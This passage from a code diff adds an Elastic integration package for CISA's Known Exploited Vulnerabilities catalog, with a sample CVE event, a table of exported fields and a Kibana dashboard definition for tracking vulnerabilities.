+ "id": "7edf8be5-ad5d-4c57-a6bd-b86bddc66601",
+ "snapshot": false,
+ "version": "8.12.2"
+ },
+ "event": {
+ "agent_id_status": "verified",
+ "category": [
+ "vulnerability"
+ ],
+ "created": "2024-03-13T01:01:09.893Z",
+ "dataset": "cisa_kevs.vulnerability",
+ "ingested": "2024-03-13T01:01:21Z",
+ "kind": "enrichment",
+ "original": "{\"cveID\":\"CVE-2020-3259\",\"dateAdded\":\"2024-02-15\",\"dueDate\":\"2024-03-07\",\"knownRansomwareCampaignUse\":\"Known\",\"notes\":\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-info-disclose-9eJtycMB\",\"product\":\"Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)\",\"requiredAction\":\"Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\",\"shortDescription\":\"Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain an information disclosure 
vulnerability. An attacker could retrieve memory contents on an affected device, which could lead to the disclosure of confidential information due to a buffer tracking issue when the software parses invalid URLs that are requested from the web services interface. This vulnerability affects only specific AnyConnect and WebVPN configurations.\",\"vendorProject\":\"Cisco\",\"vulnerabilityName\":\"Cisco ASA and FTD Information Disclosure Vulnerability\"}",
+ "type": [
+ "info"
+ ]
+ },
+ "input": {
+ "type": "httpjson"
+ },
+ "tags": [
+ "preserve_original_event",
+ "forwarded",
+ "cisa-kev"
+ ],
+ "vulnerability": {
+ "description": "Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain an information disclosure vulnerability. An attacker could retrieve memory contents on an affected device, which could lead to the disclosure of confidential information due to a buffer tracking issue when the software parses invalid URLs that are requested from the web services interface. This vulnerability affects only specific AnyConnect and WebVPN configurations.",
+ "id": "CVE-2020-3259"
+ }
+}
+```
+
+**Exported fields**
+
+| Field | Description | Type |
+|---|---|---|
+| @timestamp | Event timestamp. 
| date |
+| cisa_kev.vulnerability.date_added | The date the vulnerability was added to the catalog in the format YYYY-MM-DD | date |
+| cisa_kev.vulnerability.due_date | The date the required action is due in the format YYYY-MM-DD | date |
+| cisa_kev.vulnerability.known_ransomware_campaign_use | 'Known' if this vulnerability is known to have been leveraged as part of a ransomware campaign; 'Unknown' if CISA lacks confirmation that the vulnerability has been utilized for ransomware | keyword |
+| cisa_kev.vulnerability.name | The name of the vulnerability | keyword |
+| cisa_kev.vulnerability.notes | Any additional notes about the vulnerability | keyword |
+| cisa_kev.vulnerability.product | The vulnerability product | keyword |
+| cisa_kev.vulnerability.required_action | The required action to address the vulnerability | keyword |
+| cisa_kev.vulnerability.vendor_project | The vendor or project name for the vulnerability | keyword |
+| data_stream.dataset | Data stream dataset. | constant_keyword |
+| data_stream.namespace | Data stream namespace. | constant_keyword |
+| data_stream.type | Data stream type. | constant_keyword |
+| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword |
+| error.message | Error message. | match_only_text |
+| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. 
| keyword |
+| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date |
+| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date |
+| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword |
+| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. 
If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword |
+| event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword |
+| input.type | Type of Filebeat input. | keyword |
+| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text |
+| tags | List of keywords used to tag each event. | keyword |
+| vulnerability.description | The description of the vulnerability that provides additional context of the vulnerability. For example (https://cve.mitre.org/about/faqs.html#cve_entry_descriptions_created[Common Vulnerabilities and Exposure CVE description]) | keyword |
+| vulnerability.description.text | Multi-field of `vulnerability.description`. | match_only_text |
+| vulnerability.id | The identification (ID) is the number portion of a vulnerability entry. It includes a unique identification number for the vulnerability. For example (https://cve.mitre.org/about/faqs.html#what_is_cve_id)[Common Vulnerabilities and Exposure CVE ID] | keyword |
diff --git a/packages/cisa_kevs/img/cisa_kevs.png b/packages/cisa_kevs/img/cisa_kevs.png
new file mode 100644
index 00000000000..8fa3f18b60a
Binary files /dev/null and b/packages/cisa_kevs/img/cisa_kevs.png differ
diff --git a/packages/cisa_kevs/img/icon.svg b/packages/cisa_kevs/img/icon.svg
new file mode 100644
index 00000000000..173fdec5072
--- /dev/null
+++ b/packages/cisa_kevs/img/icon.svg
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/packages/cisa_kevs/kibana/dashboard/cisa_kevs-dcb4dd40-d17a-11ee-b159-799470efb549.json b/packages/cisa_kevs/kibana/dashboard/cisa_kevs-dcb4dd40-d17a-11ee-b159-799470efb549.json
new file mode 100644
index 00000000000..d433f8fdf0e
--- /dev/null
+++ b/packages/cisa_kevs/kibana/dashboard/cisa_kevs-dcb4dd40-d17a-11ee-b159-799470efb549.json
@@ -0,0 +1,1125 @@ +{ + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-cb06c73a-039f-465e-8e15-bee3c2c1705d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "cb06c73a-039f-465e-8e15-bee3c2c1705d": { + "columnOrder": [ + "9e6568a7-fccb-4ca6-bfa2-94c00a3fdf19", + "641309f2-f117-48e9-a8da-6c5e5721e73e" + ], + "columns": { + "641309f2-f117-48e9-a8da-6c5e5721e73e": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique Vulnerabilities", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "vulnerability.id" + }, + "9e6568a7-fccb-4ca6-bfa2-94c00a3fdf19": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Date Vulnerability Added to KEV", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "cisa_kev.vulnerability.date_added" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "event.dataset : \"cisa_kevs.vulnerability\"" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "curveType": "CURVE_MONOTONE_X", + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + 
"yRight": true + }, + "hideEndzones": false, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "641309f2-f117-48e9-a8da-6c5e5721e73e" + ], + "layerId": "cb06c73a-039f-465e-8e15-bee3c2c1705d", + "layerType": "data", + "position": "top", + "seriesType": "bar", + "showGridlines": false, + "xAccessor": "9e6568a7-fccb-4ca6-bfa2-94c00a3fdf19", + "yConfig": [ + { + "color": "#e7664c", + "forAccessor": "641309f2-f117-48e9-a8da-6c5e5721e73e" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar", + "showCurrentTimeMarker": false, + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "show", + "yLeftExtent": { + "mode": "dataBounds" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "timeRange": { + "from": "now-4y", + "to": "now" + } + }, + "gridData": { + "h": 7, + "i": "11d1dae0-5ff6-45d5-b6b4-94d3e31086ae", + "w": 48, + "x": 0, + "y": 18 + }, + "panelIndex": "11d1dae0-5ff6-45d5-b6b4-94d3e31086ae", + "title": "Vulnerabilities Added Over Time", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-unifiedHistogram", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-a8d7a9de-d9d9-44f4-834e-4cdf07d9c32a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "a8d7a9de-d9d9-44f4-834e-4cdf07d9c32a": { + "columnOrder": [ + "c4cf7f5d-0fe0-4718-a9dd-d25ea0ea7819", + "40d51c8d-52ae-4a9b-a7d2-78e58c2e13ed" + ], + "columns": { + "40d51c8d-52ae-4a9b-a7d2-78e58c2e13ed": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Known Exploitable Vulnerabilities", + "operationType": 
"unique_count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "compact": true, + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "vulnerability.id" + }, + "c4cf7f5d-0fe0-4718-a9dd-d25ea0ea7819": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "linkToLayers": [ + "unifiedHistogram" + ], + "sampling": 1 + }, + "unifiedHistogram": { + "columnOrder": [ + "count_column" + ], + "columns": { + "count_column": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Known Exploitable Vulnerabilities", + "operationType": "unique_count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "compact": true, + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "vulnerability.id" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "event.dataset :\"cisa_kevs.vulnerability\" " + }, + "visualization": { + "color": "#E7664C", + "layerId": "unifiedHistogram", + "layerType": "data", + "metricAccessor": "count_column", + "showBar": false, + "trendlineLayerId": "a8d7a9de-d9d9-44f4-834e-4cdf07d9c32a", + "trendlineLayerType": "metricTrendline", + "trendlineMetricAccessor": "40d51c8d-52ae-4a9b-a7d2-78e58c2e13ed", + "trendlineTimeAccessor": "c4cf7f5d-0fe0-4718-a9dd-d25ea0ea7819" + } + }, + "title": "Unique KEVs", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {} + }, + "gridData": { + "h": 4, + "i": "994459e2-d2d3-4789-87fe-f417c3d043d4", + "w": 13, + "x": 0, + "y": 0 + }, + "panelIndex": "994459e2-d2d3-4789-87fe-f417c3d043d4", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + 
"description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-unifiedHistogram", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-a8d7a9de-d9d9-44f4-834e-4cdf07d9c32a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "a8d7a9de-d9d9-44f4-834e-4cdf07d9c32a": { + "columnOrder": [ + "c4cf7f5d-0fe0-4718-a9dd-d25ea0ea7819", + "40d51c8d-52ae-4a9b-a7d2-78e58c2e13ed" + ], + "columns": { + "40d51c8d-52ae-4a9b-a7d2-78e58c2e13ed": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Known Exploitable Products", + "operationType": "unique_count", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "compact": true, + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "cisa_kev.vulnerability.product" + }, + "c4cf7f5d-0fe0-4718-a9dd-d25ea0ea7819": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "linkToLayers": [ + "unifiedHistogram" + ], + "sampling": 1 + }, + "unifiedHistogram": { + "columnOrder": [ + "count_column" + ], + "columns": { + "count_column": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Known Exploitable Products", + "operationType": "unique_count", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "compact": true, + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "cisa_kev.vulnerability.product" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "event.dataset :\"cisa_kevs.vulnerability\" " + }, + 
"visualization": { + "color": "#D6BF57", + "layerId": "unifiedHistogram", + "layerType": "data", + "metricAccessor": "count_column", + "showBar": false, + "trendlineLayerId": "a8d7a9de-d9d9-44f4-834e-4cdf07d9c32a", + "trendlineLayerType": "metricTrendline", + "trendlineMetricAccessor": "40d51c8d-52ae-4a9b-a7d2-78e58c2e13ed", + "trendlineTimeAccessor": "c4cf7f5d-0fe0-4718-a9dd-d25ea0ea7819" + } + }, + "title": "Unique KEVs", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 4, + "i": "b2191ffc-7417-40bb-893a-732d7ce668b0", + "w": 13, + "x": 13, + "y": 0 + }, + "panelIndex": "b2191ffc-7417-40bb-893a-732d7ce668b0", + "title": "Unique Products", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-6e62103f-8ff3-4d24-916f-7a9702eb9f31", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "6e62103f-8ff3-4d24-916f-7a9702eb9f31": { + "columnOrder": [ + "6511ebcf-280b-452d-b2a4-190f2aa65454", + "5e31744c-f016-4138-85a4-720d7de7a0d1", + "f0f76951-6c0b-4929-b049-12d9e33bbd6d", + "15f5b2d8-a528-4420-ba58-8cee1fdfac89", + "9011004c-55e8-4d7c-981a-a282871f9ac1" + ], + "columns": { + "15f5b2d8-a528-4420-ba58-8cee1fdfac89": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Date Added", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "d" + }, + "scale": "interval", + "sourceField": "cisa_kev.vulnerability.date_added" + }, + "5e31744c-f016-4138-85a4-720d7de7a0d1": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Product", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, 
+ "orderBy": { + "columnId": "9011004c-55e8-4d7c-981a-a282871f9ac1", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 100 + }, + "scale": "ordinal", + "sourceField": "cisa_kev.vulnerability.product" + }, + "6511ebcf-280b-452d-b2a4-190f2aa65454": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Vendor Project", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "9011004c-55e8-4d7c-981a-a282871f9ac1", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 100 + }, + "scale": "ordinal", + "sourceField": "cisa_kev.vulnerability.vendor_project" + }, + "9011004c-55e8-4d7c-981a-a282871f9ac1": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "f0f76951-6c0b-4929-b049-12d9e33bbd6d": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "CVE", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "9011004c-55e8-4d7c-981a-a282871f9ac1", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 1000 + }, + "scale": "ordinal", + "sourceField": "vulnerability.id" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "event.dataset : \"cisa_kevs.vulnerability\"" + }, + "visualization": { + "columns": [ + { + "columnId": 
"f0f76951-6c0b-4929-b049-12d9e33bbd6d", + "isTransposed": false, + "width": 147.05555555555554 + }, + { + "columnId": "6511ebcf-280b-452d-b2a4-190f2aa65454", + "isTransposed": false, + "width": 137.55555555555554 + }, + { + "columnId": "5e31744c-f016-4138-85a4-720d7de7a0d1", + "isTransposed": false, + "width": 163.05555555555554 + }, + { + "columnId": "9011004c-55e8-4d7c-981a-a282871f9ac1", + "hidden": true, + "isTransposed": false + }, + { + "alignment": "left", + "columnId": "15f5b2d8-a528-4420-ba58-8cee1fdfac89", + "hidden": false, + "isTransposed": false + } + ], + "layerId": "6e62103f-8ff3-4d24-916f-7a9702eb9f31", + "layerType": "data", + "paging": { + "enabled": true, + "size": 10 + }, + "rowHeight": "auto", + "sorting": { + "columnId": "15f5b2d8-a528-4420-ba58-8cee1fdfac89", + "direction": "desc" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 18, + "i": "35f41e97-ee29-4ae8-b1f8-da96071026c5", + "w": 22, + "x": 26, + "y": 0 + }, + "panelIndex": "35f41e97-ee29-4ae8-b1f8-da96071026c5", + "title": "Most Recent Vulnerabilities Added to the KEV List", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-a3231286-d69b-47b3-9a8c-940078747bbb", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "a3231286-d69b-47b3-9a8c-940078747bbb": { + "columnOrder": [ + "bad40eca-3d67-4d08-a6a8-21873637f577", + "876576e4-3fec-400a-8f1e-015262b3aea5" + ], + "columns": { + "876576e4-3fec-400a-8f1e-015262b3aea5": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "bad40eca-3d67-4d08-a6a8-21873637f577": { + "dataType": 
"string", + "isBucketed": true, + "label": "Top 5 values of cisa_kev.vulnerability.vendor_project", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "876576e4-3fec-400a-8f1e-015262b3aea5", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "cisa_kev.vulnerability.vendor_project" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "event.dataset : \"cisa_kevs.vulnerability\" " + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "emptySizeRatio": 0.54, + "layerId": "a3231286-d69b-47b3-9a8c-940078747bbb", + "layerType": "data", + "legendDisplay": "default", + "metrics": [ + "876576e4-3fec-400a-8f1e-015262b3aea5" + ], + "nestedLegend": false, + "numberDisplay": "value", + "percentDecimals": 1, + "primaryGroups": [ + "bad40eca-3d67-4d08-a6a8-21873637f577" + ] + } + ], + "palette": { + "name": "default", + "type": "palette" + }, + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": "aaae6248-e18f-4e38-ba33-65fd6339ceb5", + "w": 13, + "x": 0, + "y": 4 + }, + "panelIndex": "aaae6248-e18f-4e38-ba33-65fd6339ceb5", + "title": "Top 5 Vendor Projects", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-00d70036-f0e2-4855-bf07-cb4170c30898", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "00d70036-f0e2-4855-bf07-cb4170c30898": { + 
"columnOrder": [ + "7367379b-5e97-4019-8efa-4b89083ce8b7", + "46fce31b-a82a-4fbd-b147-28a7287ca393" + ], + "columns": { + "46fce31b-a82a-4fbd-b147-28a7287ca393": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "7367379b-5e97-4019-8efa-4b89083ce8b7": { + "dataType": "string", + "isBucketed": true, + "label": "Top 5 values of cisa_kev.vulnerability.product", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "46fce31b-a82a-4fbd-b147-28a7287ca393", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "cisa_kev.vulnerability.product" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "event.dataset : \"cisa_kevs.vulnerability\" " + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "emptySizeRatio": 0.54, + "layerId": "00d70036-f0e2-4855-bf07-cb4170c30898", + "layerType": "data", + "legendDisplay": "default", + "metrics": [ + "46fce31b-a82a-4fbd-b147-28a7287ca393" + ], + "nestedLegend": false, + "numberDisplay": "value", + "primaryGroups": [ + "7367379b-5e97-4019-8efa-4b89083ce8b7" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": "b2398a92-2791-44d2-ab6e-62168742b786", + "w": 13, + "x": 13, + "y": 4 + }, + "panelIndex": "b2398a92-2791-44d2-ab6e-62168742b786", + "title": "Top 5 Exploitable Products", + "type": "lens" + }, + { + "embeddableConfig": 
{ + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-6e62103f-8ff3-4d24-916f-7a9702eb9f31", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "6e62103f-8ff3-4d24-916f-7a9702eb9f31": { + "columnOrder": [ + "6511ebcf-280b-452d-b2a4-190f2aa65454", + "5e31744c-f016-4138-85a4-720d7de7a0d1", + "f0f76951-6c0b-4929-b049-12d9e33bbd6d", + "068fcaff-a6b1-4c7c-8e5f-95acda8cdf17", + "9011004c-55e8-4d7c-981a-a282871f9ac1" + ], + "columns": { + "068fcaff-a6b1-4c7c-8e5f-95acda8cdf17": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Description", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "9011004c-55e8-4d7c-981a-a282871f9ac1", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 5000 + }, + "scale": "ordinal", + "sourceField": "vulnerability.description" + }, + "5e31744c-f016-4138-85a4-720d7de7a0d1": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Product", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "9011004c-55e8-4d7c-981a-a282871f9ac1", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 5000 + }, + "scale": "ordinal", + "sourceField": "cisa_kev.vulnerability.product" + }, + "6511ebcf-280b-452d-b2a4-190f2aa65454": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Vendor Project", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + 
"missingBucket": false, + "orderBy": { + "columnId": "9011004c-55e8-4d7c-981a-a282871f9ac1", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 500 + }, + "scale": "ordinal", + "sourceField": "cisa_kev.vulnerability.vendor_project" + }, + "9011004c-55e8-4d7c-981a-a282871f9ac1": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "f0f76951-6c0b-4929-b049-12d9e33bbd6d": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "CVE", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "9011004c-55e8-4d7c-981a-a282871f9ac1", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 5000 + }, + "scale": "ordinal", + "sourceField": "vulnerability.id" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "event.dataset : \"cisa_kevs.vulnerability\" " + }, + "visualization": { + "columns": [ + { + "columnId": "f0f76951-6c0b-4929-b049-12d9e33bbd6d", + "isTransposed": false, + "width": 147.05555555555554 + }, + { + "columnId": "6511ebcf-280b-452d-b2a4-190f2aa65454", + "isTransposed": false, + "width": 137.55555555555554 + }, + { + "columnId": "5e31744c-f016-4138-85a4-720d7de7a0d1", + "isTransposed": false, + "width": 163.05555555555554 + }, + { + "columnId": "9011004c-55e8-4d7c-981a-a282871f9ac1", + "hidden": true, + "isTransposed": false + }, + { + "columnId": "068fcaff-a6b1-4c7c-8e5f-95acda8cdf17", + "isTransposed": false + } + ], + "layerId": "6e62103f-8ff3-4d24-916f-7a9702eb9f31", 
+ "layerType": "data", + "rowHeight": "auto" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 16, + "i": "16245c6e-c656-4464-8e41-2f2ef485c99d", + "w": 48, + "x": 0, + "y": 25 + }, + "panelIndex": "16245c6e-c656-4464-8e41-2f2ef485c99d", + "title": "Details", + "type": "lens" + } + ], + "timeRestore": false, + "title": "[Vulnerability] CISA Known Exploited Vulnerabilities", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-02-29T03:20:22.877Z", + "id": "cisa_kevs-dcb4dd40-d17a-11ee-b159-799470efb549", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "11d1dae0-5ff6-45d5-b6b4-94d3e31086ae:indexpattern-datasource-layer-cb06c73a-039f-465e-8e15-bee3c2c1705d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "994459e2-d2d3-4789-87fe-f417c3d043d4:indexpattern-datasource-layer-unifiedHistogram", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "994459e2-d2d3-4789-87fe-f417c3d043d4:indexpattern-datasource-layer-a8d7a9de-d9d9-44f4-834e-4cdf07d9c32a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b2191ffc-7417-40bb-893a-732d7ce668b0:indexpattern-datasource-layer-unifiedHistogram", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 